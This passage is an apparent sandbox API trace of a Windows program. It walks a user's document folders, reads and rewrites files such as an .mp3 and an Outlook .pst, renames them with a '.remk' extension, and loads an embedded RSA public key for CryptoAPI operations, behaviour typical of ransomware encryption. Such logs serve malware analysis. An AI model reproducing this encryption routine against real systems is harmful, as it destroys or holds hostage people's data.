hHeap=0x630000) returned 1 [0233.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0233.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0233.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0233.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0233.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee448 [0233.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0233.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0233.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0233.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0233.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0233.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3e8 [0233.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0233.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0233.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0233.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0233.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee400 [0233.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0233.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0233.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0233.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3d0 [0233.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0233.272] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee460 [0233.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.273] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xe742, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.273] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.273] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.273] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.274] CloseHandle (hObject=0x640) returned 1 [0233.279] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\XOigXkWrr1j.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\xoigxkwrr1j.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\XOigXkWrr1j.mp3.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\xoigxkwrr1j.mp3.remk")) returned 1 [0233.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d3b8 | out: hHeap=0x630000) returned 1 [0233.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.280] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0233.281] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6238000, ftCreationTime.dwHighDateTime=0x1d5dbd7, ftLastAccessTime.dwLowDateTime=0x9b31b7a0, ftLastAccessTime.dwHighDateTime=0x1d5e695, ftLastWriteTime.dwLowDateTime=0x9b31b7a0, ftLastWriteTime.dwHighDateTime=0x1d5e695, nFileSizeHigh=0x0, nFileSizeLow=0xe742, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XOigXkWrr1j.mp3", cAlternateFileName="XOIGXK~1.MP3")) returned 0 [0233.281] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0233.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0233.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba600 | out: hHeap=0x630000) returned 1 [0233.281] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0233.281] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0233.282] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0233.282] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0233.282] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0233.282] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0233.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.282] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0233.282] PathFindFileNameW (pszPath="") returned="" [0233.282] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6238000, ftCreationTime.dwHighDateTime=0x1d5dbd7, ftLastAccessTime.dwLowDateTime=0x9b31b7a0, ftLastAccessTime.dwHighDateTime=0x1d5e695, ftLastWriteTime.dwLowDateTime=0x9b31b7a0, ftLastWriteTime.dwHighDateTime=0x1d5e695, nFileSizeHigh=0x0, nFileSizeLow=0xe742, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XOigXkWrr1j.mp3", cAlternateFileName="XOIGXK~1.MP3")) returned 0xffffffff [0233.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba510 | out: hHeap=0x630000) returned 1 [0233.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0233.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba600 | out: hHeap=0x630000) returned 1 [0233.282] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0233.283] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0233.283] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0233.283] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0233.283] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0233.283] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0233.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.283] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0233.283] PathFindFileNameW (pszPath="") returned="" [0233.283] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6238000, ftCreationTime.dwHighDateTime=0x1d5dbd7, ftLastAccessTime.dwLowDateTime=0x9b31b7a0, ftLastAccessTime.dwHighDateTime=0x1d5e695, ftLastWriteTime.dwLowDateTime=0x9b31b7a0, ftLastWriteTime.dwHighDateTime=0x1d5e695, nFileSizeHigh=0x0, nFileSizeLow=0xe742, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XOigXkWrr1j.mp3", cAlternateFileName="XOIGXK~1.MP3")) returned 0xffffffff [0233.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba510 | out: hHeap=0x630000) returned 1 [0233.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0233.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba600 | out: hHeap=0x630000) returned 1 [0233.283] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0233.283] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0233.283] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0233.283] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0233.283] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0233.284] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0233.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.284] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0233.284] PathFindFileNameW (pszPath="") returned="" [0233.284] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0233.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba510 | out: hHeap=0x630000) returned 1 [0233.284] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0233.284] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0233.284] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned=".ini" [0233.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0233.284] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0233.284] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned=".vss" [0233.284] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.285] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=0) returned 1 [0233.285] CloseHandle (hObject=0x640) returned 1 [0233.286] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss.remk")) returned 1 [0233.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0233.286] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0233.286] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0233.286] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0233.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0233.287] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba600 | out: hHeap=0x630000) returned 1 [0233.287] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0233.287] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0233.287] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0233.287] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0233.287] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0233.287] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0233.287] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0233.287] PathFindFileNameW (pszPath="") returned="" [0233.287] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0233.287] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0233.287] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0233.287] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0233.287] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0233.288] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0233.288] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0233.288] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0233.288] PathFindFileNameW (pszPath="") returned="" [0233.288] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0233.288] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0233.288] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0233.288] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned=".pst" [0233.288] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.289] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=271360) returned 1 [0233.289] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.292] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x423da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.292] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.293] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0233.293] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x25805, lpOverlapped=0x0) returned 1 [0233.296] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.296] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.296] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.296] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0233.297] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.297] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.297] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.297] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.297] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 